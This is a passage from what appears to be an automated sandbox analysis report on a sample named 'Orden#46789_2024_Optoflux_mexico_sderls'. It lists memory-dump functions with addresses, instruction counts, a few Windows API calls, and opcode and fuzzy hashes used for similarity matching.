                                                                            • Opcode ID: 2b092b05bed9fb13c853e697c59c17ed1d113e6468d982122c4ca7e5955b5697
                                                                            • Instruction ID: 12918522b40a386c1c909aded9ded4bffdda9ae06c7e30c7d48e48a01bb2c912
                                                                            • Opcode Fuzzy Hash: 2b092b05bed9fb13c853e697c59c17ed1d113e6468d982122c4ca7e5955b5697
                                                                            • Instruction Fuzzy Hash: 9811F2B5900749EFDB10DF9AD984BDEBBF8EB48324F108419E519A7600D3B5A944CFE1
                                                                            Function 0076C540 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0076C5A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979322070.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_760000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 4361246767f7f73b414db065690e87aedaef0a0235ada2ac2da05f6dea8cb533
                                                                            • Instruction ID: 69d23d2100871f539d526a5c82bec3a6d234a2e25dbcc44ecef2c8253fec276b
                                                                            • Opcode Fuzzy Hash: 4361246767f7f73b414db065690e87aedaef0a0235ada2ac2da05f6dea8cb533
                                                                            • Instruction Fuzzy Hash: E61102B5C007498FCB10CF9AC944A9EFBF4AB88320F20841AD85AB7200D379A545CFA1
                                                                            Function 079ADC49 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 079ADCAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2985881190.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_79a0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 82c76326c1995989b5f70741b58369cd90861fc2756688babe4b4eeb180551c2
                                                                            • Instruction ID: b7bc212b314c13524e828919c33c4c8dac8b774c5fd7d6a1cb07a69fd1fffc18
                                                                            • Opcode Fuzzy Hash: 82c76326c1995989b5f70741b58369cd90861fc2756688babe4b4eeb180551c2
                                                                            • Instruction Fuzzy Hash: 1511F2B5800389DFDB10CF9AD985BDEBFF8EB48324F20845AE559A7610C3B5A554CFA0
                                                                            Function 0814EA85 Relevance: .6, Instructions: 605COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 549b786038e50421ed61e88d77fed21e008d2e4603b342cfc1689ce67f5b3efb
                                                                            • Instruction ID: eb768fd267af81b6b61e337230e3ea0c2a6034a2632e6a3b2cb6df5d14e74167
                                                                            • Opcode Fuzzy Hash: 549b786038e50421ed61e88d77fed21e008d2e4603b342cfc1689ce67f5b3efb
                                                                            • Instruction Fuzzy Hash: 4F220674A193808FC705FBB8E89865C7FB1EF85210F4945AAD889E7392DF388C46C761
                                                                            Function 00BF8FB8 Relevance: .5, Instructions: 523COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f71fca35ca2679fcc1185b0f162f2721d6f89a856f4731c31f2458d28d7fe4f
                                                                            • Instruction ID: 492ae783255cf96da581c5cda78568ce4fc868358a29a5243f56fc5bf1aa8817
                                                                            • Opcode Fuzzy Hash: 6f71fca35ca2679fcc1185b0f162f2721d6f89a856f4731c31f2458d28d7fe4f
                                                                            • Instruction Fuzzy Hash: 14224C30A00209DFCB25DF69C884AADBBF1FF88314F148599EA599B3A1DB30ED45CB50
                                                                            Function 0814E4A0 Relevance: .4, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 309be228ecb4e9c243f21a365bf8bc28faca3d3e0531d9bb1d40a207b0fe6bd2
                                                                            • Instruction ID: 64f67e6bc1fa8012de6fe96ba61cccf21af92a0ac555baf72d51c07074482dd7
                                                                            • Opcode Fuzzy Hash: 309be228ecb4e9c243f21a365bf8bc28faca3d3e0531d9bb1d40a207b0fe6bd2
                                                                            • Instruction Fuzzy Hash: DAE1A570B116058BC708FBB8F89965D7BB2FF88220F955968E845E3385DE389C85C7A1
                                                                            Function 081430B8 Relevance: .4, Instructions: 416COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d753682112e93250a0db95a028c1c1d7515898eb4c41306582deb87de3975b1b
                                                                            • Instruction ID: 1f44d671450657eecb49402a97a29c6c232025f4f31aab64617db1e24d568d69
                                                                            • Opcode Fuzzy Hash: d753682112e93250a0db95a028c1c1d7515898eb4c41306582deb87de3975b1b
                                                                            • Instruction Fuzzy Hash: 2AD1E670B152158BDB08BBB8E89566EBBF6EFC8200F40496DE849E7381DF385C45C7A5
                                                                            Function 00BF79E8 Relevance: .4, Instructions: 370COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc44022864e2d1af78010cbeb69f9c32d87336b2ad850d14f9dee7ec2866cbd0
                                                                            • Instruction ID: 6fcceb48b6033983bf0eeeecd048735eb4f37682a0fd9539c95369529da84111
                                                                            • Opcode Fuzzy Hash: dc44022864e2d1af78010cbeb69f9c32d87336b2ad850d14f9dee7ec2866cbd0
                                                                            • Instruction Fuzzy Hash: 93D1AC34B442099FDB05AF64C858B7E7BE6EB88700F1488A9E606DB391CF748D46CB91
                                                                            Function 0814CB40 Relevance: .4, Instructions: 366COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f80941a75328befc931dad74a80cfbe18c74d8d0ac988160d82d920f02093c4
                                                                            • Instruction ID: 7581d83e28505589d59712fb69b083c48dd46b5deb38a25f55e0fe845f88ac5f
                                                                            • Opcode Fuzzy Hash: 7f80941a75328befc931dad74a80cfbe18c74d8d0ac988160d82d920f02093c4
                                                                            • Instruction Fuzzy Hash: 1DC1A231B11611CBCB08BBB8F89962D7BF2FF88611F454968E849E3355DE349C8AC791
                                                                            Function 00BF9E08 Relevance: .4, Instructions: 357COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f8a8738a0386542f4ff405b92c9280e32801a306184b2d66f167cdd661d8f48
                                                                            • Instruction ID: 911c4b452ab4e8aac11f1f1ebdb8992eec92a38331e183d0b5271202a17e2243
                                                                            • Opcode Fuzzy Hash: 6f8a8738a0386542f4ff405b92c9280e32801a306184b2d66f167cdd661d8f48
                                                                            • Instruction Fuzzy Hash: EDE10C75A001198FCB08CFA8D9889ADBBF2FF89310F168195E619EB361C735ED45CB51
                                                                            Function 00BFECD0 Relevance: .4, Instructions: 351COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb4d7050e90650d54324985edbf4526de35eb5343a4acce9e77fd5a448288714
                                                                            • Instruction ID: 9076837cad0f6bcf57363bf7805f9c7db114cd7f196fd35becffa0062b9bef69
                                                                            • Opcode Fuzzy Hash: eb4d7050e90650d54324985edbf4526de35eb5343a4acce9e77fd5a448288714
                                                                            • Instruction Fuzzy Hash: 46D107356002499FD711DF68C884A7EBBE6FF85310F1486A6EA64CB362D731EC16C7A1
                                                                            Function 0814DDDC Relevance: .3, Instructions: 301COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e844243e5418cfe7450707dcea9dfba968f8c3db977900fef9ba4f4f7cd7aa7
                                                                            • Instruction ID: b8a80883ca8e22599a059c499e4a6effe6b886c50ddfda56a13dbf0e29f2f284
                                                                            • Opcode Fuzzy Hash: 2e844243e5418cfe7450707dcea9dfba968f8c3db977900fef9ba4f4f7cd7aa7
                                                                            • Instruction Fuzzy Hash: 0FA1D570B156548FCB04FBB8E898A5D7BB2FF88610F410968E845E7391DF389C55C7A1
                                                                            Function 0814CAF7 Relevance: .3, Instructions: 295COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 093cb5665f48379a2606f997e51ff7c6a8da02b4c4e714729c2e30511013f2b8
                                                                            • Instruction ID: e24e16c7d737eb6a2115b84900178afae4a1b2904a883b53987e0eaa0a49dfd3
                                                                            • Opcode Fuzzy Hash: 093cb5665f48379a2606f997e51ff7c6a8da02b4c4e714729c2e30511013f2b8
                                                                            • Instruction Fuzzy Hash: 2BA1D131B05651CFCB04BBB8F49962D7BB1EF88611F4448A9E849D7392DF389C8AC791
                                                                            Function 00BFCF88 Relevance: .2, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e3b946f614fffdf09a701324a56a84781a68ccf56886cc5268431bc0ad281c0
                                                                            • Instruction ID: 717a2d26f38a83118a7823ef3727f3fcf6f4c8039913358093df0219539e9e18
                                                                            • Opcode Fuzzy Hash: 0e3b946f614fffdf09a701324a56a84781a68ccf56886cc5268431bc0ad281c0
                                                                            • Instruction Fuzzy Hash: C57105347042098FCB15DF28C898A7E7BE6EF89740F1940A9EA06DB3A1DB71DD45CB90
                                                                            Function 00BF480F Relevance: .2, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10bbc6649d3911cf3a8ecf8b7ef6b5d8b92d67ef19e1db9e75ef3b4ab7bc9ee3
                                                                            • Instruction ID: 3e1490c70a80f90d67acb8ac1aaf263a5b07d3a1ad9433cb069b3643c397fbf2
                                                                            • Opcode Fuzzy Hash: 10bbc6649d3911cf3a8ecf8b7ef6b5d8b92d67ef19e1db9e75ef3b4ab7bc9ee3
                                                                            • Instruction Fuzzy Hash: F371C174E0425CCFDB14DFA9D484AAEBBB1FF89300F24856AE915AB260D7706946CF50
                                                                            Function 00BFA258 Relevance: .2, Instructions: 182COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93d9c42a7786fb71723a03a85530cc4eaf322aae5783624cf91bb9e5a8c940e8
                                                                            • Instruction ID: f5d8fc104a5521a452063a285307a0890e4e053e7286c6f1c541b7983dff13b4
                                                                            • Opcode Fuzzy Hash: 93d9c42a7786fb71723a03a85530cc4eaf322aae5783624cf91bb9e5a8c940e8
                                                                            • Instruction Fuzzy Hash: 10618875B00219CFCB19CF69C48896DBBE6EF85350B0684A9EA09DB3A6C730EC45C795
                                                                            Function 08140850 Relevance: .2, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8c8f265179eadd90aa670ab37056918279ace17a0eb0c98b69420e402381120
                                                                            • Instruction ID: e250cb642753a7d71af8a7a644b7d036d221533fd9e48a5d59d326d426fc62c1
                                                                            • Opcode Fuzzy Hash: a8c8f265179eadd90aa670ab37056918279ace17a0eb0c98b69420e402381120
                                                                            • Instruction Fuzzy Hash: 7D517130A007099FDB15DF69C85469DBBF2EF89300F14956DE805AB251EF70AD86CB91
                                                                            Function 00BF5110 Relevance: .1, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 06f72c2489ffd3622bbb2db748510226e35cd380bfd629c9f5ec641f59f92bd3
                                                                            • Instruction ID: be3ea03231d854515432af81bbb5c8d98a9b781f8ccd2122116107348370ef0d
                                                                            • Opcode Fuzzy Hash: 06f72c2489ffd3622bbb2db748510226e35cd380bfd629c9f5ec641f59f92bd3
                                                                            • Instruction Fuzzy Hash: 8E51E174E002089FDB14DFAAD8847AEBBF2BF88300F14856AE515BB3A4DB755946CF50
                                                                            Function 00BF4A2B Relevance: .1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1ced7657a6dc5e8ea1194ed89911599c2dc2765c6a323ee0bb9e45d04256fcbf
                                                                            • Instruction ID: de780641a43bc80d81bf7e129ad01623493a890599d7679dc9437b64f02f844d
                                                                            • Opcode Fuzzy Hash: 1ced7657a6dc5e8ea1194ed89911599c2dc2765c6a323ee0bb9e45d04256fcbf
                                                                            • Instruction Fuzzy Hash: 66411474D49208DFCB04CFAAD4846EEBBF6FF89300F1490AAD515A7261DB749A49CF50
                                                                            Function 00BF54A8 Relevance: .1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ad4e65179bfea2ba91e29ad1489c8b4a1b11ab554ac2d8b940e135b59eda531
                                                                            • Instruction ID: 11a19a62c8c4b6673b30c93caf766cc874baf494ce38c364daf3409a6626c276
                                                                            • Opcode Fuzzy Hash: 6ad4e65179bfea2ba91e29ad1489c8b4a1b11ab554ac2d8b940e135b59eda531
                                                                            • Instruction Fuzzy Hash: D75103B4D00248DFDB14DFA9D5583EDBBF1EF89304F1480A9D515A72A1DB784A8ACF50
                                                                            Function 08142ACA Relevance: .1, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae4aa09354a6286fee0dd4c965f99856bbd60a68c0ef15c2ce2e470db468c9cf
                                                                            • Instruction ID: 3a5c4e947ea547f1ad75e0a66edf5203966338a871d7ad05baf47342af03cafa
                                                                            • Opcode Fuzzy Hash: ae4aa09354a6286fee0dd4c965f99856bbd60a68c0ef15c2ce2e470db468c9cf
                                                                            • Instruction Fuzzy Hash: EA414A309007099FCB14DFA9C85469DBBB1EF89311F14D66DE8497B260EB70A9C6CB90
                                                                            Function 00BF4698 Relevance: .1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e8ff8b5712ac5c686774a6bf5a1317be6034bf30c48cc10c81ae14655b8c36c
                                                                            • Instruction ID: a329738e975e9bcc8a0a62aabeae3f7d2e8e1dddd0f3f3842bdd6724448d02ed
                                                                            • Opcode Fuzzy Hash: 3e8ff8b5712ac5c686774a6bf5a1317be6034bf30c48cc10c81ae14655b8c36c
                                                                            • Instruction Fuzzy Hash: 43410274E002588BDB04DFA9D9447EEBBF2BF89300F149169E904B73A4EB34594ACB50
                                                                            Function 081424B8 Relevance: .1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c39cf878b0e37f201a23b9ec202bbb0b4a958c4252a3a66ef40e0b13395d11e0
                                                                            • Instruction ID: 976ecee0b866f5c9ce2712e0686b7b355b926b9ce773d6247b0e3c3c81b9da6f
                                                                            • Opcode Fuzzy Hash: c39cf878b0e37f201a23b9ec202bbb0b4a958c4252a3a66ef40e0b13395d11e0
                                                                            • Instruction Fuzzy Hash: AA4145B1D043498FDF04DFA9D994AEEBBF5BF88300F108469E406BB250DB789945CBA0
                                                                            Function 00BF46A8 Relevance: .1, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e12de19d9070d0e13c82b90950eb1d037dcb9fd6b436746814c0b49445507f55
                                                                            • Instruction ID: b17db391abc4cc819fe48de8e72326c16084fe0c33bafe85562715362fa3ef1c
                                                                            • Opcode Fuzzy Hash: e12de19d9070d0e13c82b90950eb1d037dcb9fd6b436746814c0b49445507f55
                                                                            • Instruction Fuzzy Hash: 4241B074E012189FDB04DFAAD9447EEBBF2BF89300F149169E914B33A4EB745946CB60
                                                                            Function 00BFE1B0 Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f792cde78f27a1eeba6756bd612d881130f73ebd086da522539b34d7d0461eb5
                                                                            • Instruction ID: e3d3906e546613e7cf0aa7faccf27b5f2eda98ed119e7abecfe9eede3de53f3c
                                                                            • Opcode Fuzzy Hash: f792cde78f27a1eeba6756bd612d881130f73ebd086da522539b34d7d0461eb5
                                                                            • Instruction Fuzzy Hash: 4031B7307042098BDB259BA9DC9463E7BE9FF8470071854DBD662CB3A6FB24DC85C792
                                                                            Function 081442FF Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d62a1ed52c5a0ef8e66fbba8693c9f48d0f67413d8774b0212e1c6529f7e6fd5
                                                                            • Instruction ID: 24d4fd192ebb3d86077576b5f0eea0080d5dd5fcf08fcce1ec744f5f71dbcc20
                                                                            • Opcode Fuzzy Hash: d62a1ed52c5a0ef8e66fbba8693c9f48d0f67413d8774b0212e1c6529f7e6fd5
                                                                            • Instruction Fuzzy Hash: 2731E4747055518FC708BBBCE898A2D7BF6FF89610B4504ADE44AC73A2CE389C06C7A5
                                                                            Function 00BF9C41 Relevance: .1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e31469368ba69d86c04be61c5e21b72f670bc5b1697a6aff095dc1a9f6873a9
                                                                            • Instruction ID: 9257fe18e5ac736a8cce2ba2c60c2261765dbd8109c61ca039ef245b33242ee2
                                                                            • Opcode Fuzzy Hash: 6e31469368ba69d86c04be61c5e21b72f670bc5b1697a6aff095dc1a9f6873a9
                                                                            • Instruction Fuzzy Hash: 2B31AF35B042449FDB059B75D8587AE7BF2AFC8610F1484AAE906EB391DF319C15CB90
                                                                            Function 081423B0 Relevance: .1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8364c63839ebe103f65d4c34956b7523510fba52c9e0028e94ebb16408fe30f0
                                                                            • Instruction ID: 7bcdddf2271fd917d8a2d938125987da151d5bd376a0a4940476eb5257165baf
                                                                            • Opcode Fuzzy Hash: 8364c63839ebe103f65d4c34956b7523510fba52c9e0028e94ebb16408fe30f0
                                                                            • Instruction Fuzzy Hash: 8A316131E047498FCB11DFA9D8505EEBBF4EF89310B14816FE545E7251EB309985CBA1
                                                                            Function 00BF71A8 Relevance: .1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2979901997.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_bf0000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc008250d7adca85bf9e8aea1edc7685a2f8e4e57c6e70dc7985cfe181474a3b
                                                                            • Instruction ID: 8ba17c652601b7e0addc78e835c35d7e66e17e24968ee02c94d74d3ecce58d87
                                                                            • Opcode Fuzzy Hash: bc008250d7adca85bf9e8aea1edc7685a2f8e4e57c6e70dc7985cfe181474a3b
                                                                            • Instruction Fuzzy Hash: 0831A1356441099FCF059FA8D848A7E3BE2FB89710F0080A9FA059B394CF71DDA9CB91
                                                                            Function 08142CEF Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8140000_Orden#46789_2024_Optoflux_mexico_sderls.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1143a41163831be888a33d7eb2db8e48c1a3a10105ea69ad8412fb21a6e3cfbf
                                                                            • Instruction ID: 80816fbbc2c98f2f281570a62a7e738ef34a33bcd7dc943c71bc3395488459f7
                                                                            • Opcode Fuzzy Hash: 1143a41163831be888a33d7eb2db8e48c1a3a10105ea69ad8412fb21a6e3cfbf
                                                                            • Instruction Fuzzy Hash: 123145B0D00208DFDB24DFA9C588B9EBBF5EF48710F24846EE405BB240C7B56845CB61
                                                                            Function 08144318 Relevance: .1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2986222602.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
